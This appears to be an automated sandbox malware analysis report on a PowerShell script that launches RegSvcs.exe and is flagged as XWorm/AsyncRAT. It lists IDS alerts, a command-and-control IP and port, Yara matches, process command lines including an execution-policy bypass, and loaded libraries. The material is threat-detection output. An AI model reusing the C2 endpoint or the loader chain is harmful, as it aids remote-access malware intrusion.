      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb$3 source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdbMZ@ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1673465265.000001E70CD29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1697055181.000001E723A60000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3150292171.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: ?;oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.pdbMZ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: %%.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbj- source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3163033703.00000000053A1000.00000004.00000020.00020000.00000000.sdmp, WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.pdb@ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Drawing.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: mscorlib.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.pdbH source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: @;o.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: HP/o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49708 -> 92.255.57.155:4411
      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.8:49708
      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49708 -> 92.255.57.155:4411
      Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.8:49708
      Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49708 -> 92.255.57.155:4411
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: 92.255.57.155
      Source: global trafficTCP traffic: 192.168.2.8:49708 -> 92.255.57.155:4411
      Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: powershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1673465265.000001E70CA36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
      Source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFF2884_2_02BFF288
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF22E84_2_02BF22E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFE0A04_2_02BFE0A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF40144_2_02BF4014
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF61404_2_02BF6140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF81404_2_02BF8140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF76004_2_02BF7600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFC7D84_2_02BFC7D8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF641B4_2_02BF641B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF6A204_2_02BF6A20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF7A184_2_02BF7A18
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFFB024_2_02BFFB02
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFE8A84_2_02BFE8A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF78304_2_02BF7830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF6E204_2_02BF6E20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF0F884_2_02BF0F88
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFBF084_2_02BFBF08
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF42E84_2_02BF42E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF42D94_2_02BF42D9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF625F4_2_02BF625F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFE0914_2_02BFE091
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF204F4_2_02BF204F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF218C4_2_02BF218C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF813B4_2_02BF813B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF61334_2_02BF6133
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF51214_2_02BF5121
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF211A4_2_02BF211A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF51484_2_02BF5148
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF66984_2_02BF6698
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF36D04_2_02BF36D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFF7504_2_02BFF750
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFF7414_2_02BFF741
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFD4014_2_02BFD401
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF35B04_2_02BF35B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF35A04_2_02BF35A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF75F04_2_02BF75F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF55384_2_02BF5538
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF55484_2_02BF5548
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF6A104_2_02BF6A10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF1B884_2_02BF1B88
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF4BE04_2_02BF4BE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF4BD14_2_02BF4BD1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BFBBC04_2_02BFBBC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF1B084_2_02BF1B08
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF2B504_2_02BF2B50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF2B404_2_02BF2B40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF085F4_2_02BF085F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF1EB64_2_02BF1EB6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF6E104_2_02BF6E10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF1F164_2_02BF1F16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF0F004_2_02BF0F00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BF1DA14_2_02BF1DA1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056075344_2_05607534
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056034104_2_05603410
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056006D04_2_056006D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05602DE84_2_05602DE8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05600EF84_2_05600EF8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056009614_2_05600961
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056028D84_2_056028D8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056084674_2_05608467
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056006C04_2_056006C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_056083BF4_2_056083BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05600FAE4_2_05600FAE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05608E504_2_05608E50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05603B394_2_05603B39
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05608B1F4_2_05608B1F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05608A634_2_05608A63
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05600AF84_2_05600AF8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05608ADF4_2_05608ADF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05608A8A4_2_05608A8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 1876
      Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
      Source: powershell.exe, 00000000.00000002.1672895709.000001E7098B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
      Source: classification engineClassification label: mal100.troj.evad.winPS1@9/14@0/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
      Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1056
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_raxan3yr.n0w.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: QP2uO3eN2p.ps1ReversingLabs: Detection: 23%
      Source: QP2uO3eN2p.ps1Virustotal: Detection: 28%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 1876
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
